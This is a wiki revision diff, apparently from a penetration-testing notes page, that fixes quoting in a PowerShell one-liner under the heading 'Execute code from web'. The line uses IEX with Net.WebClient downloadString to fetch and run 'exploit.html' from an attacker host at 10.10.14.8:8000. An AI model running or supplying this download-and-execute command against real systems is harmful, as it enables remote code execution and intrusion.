Changes

Jump to navigation Jump to search
1 byte removed ,  10:40, 16 January 2020
m
no edit summary
Line 1: Line 1: −
== Execute code from web ==
+
==Execute code from web==
 
<syntaxhighlight lang="powershell">
 
<syntaxhighlight lang="powershell">
powershell "IEX(New-Object Net.WebClient).downloadString("10.10.14.8:8000/exploit.html")
+
powershell "IEX(New-Object Net.WebClient).downloadString('10.10.14.8:8000/exploit.html')"
 
</syntaxhighlight>
 
</syntaxhighlight>
  

Navigation menu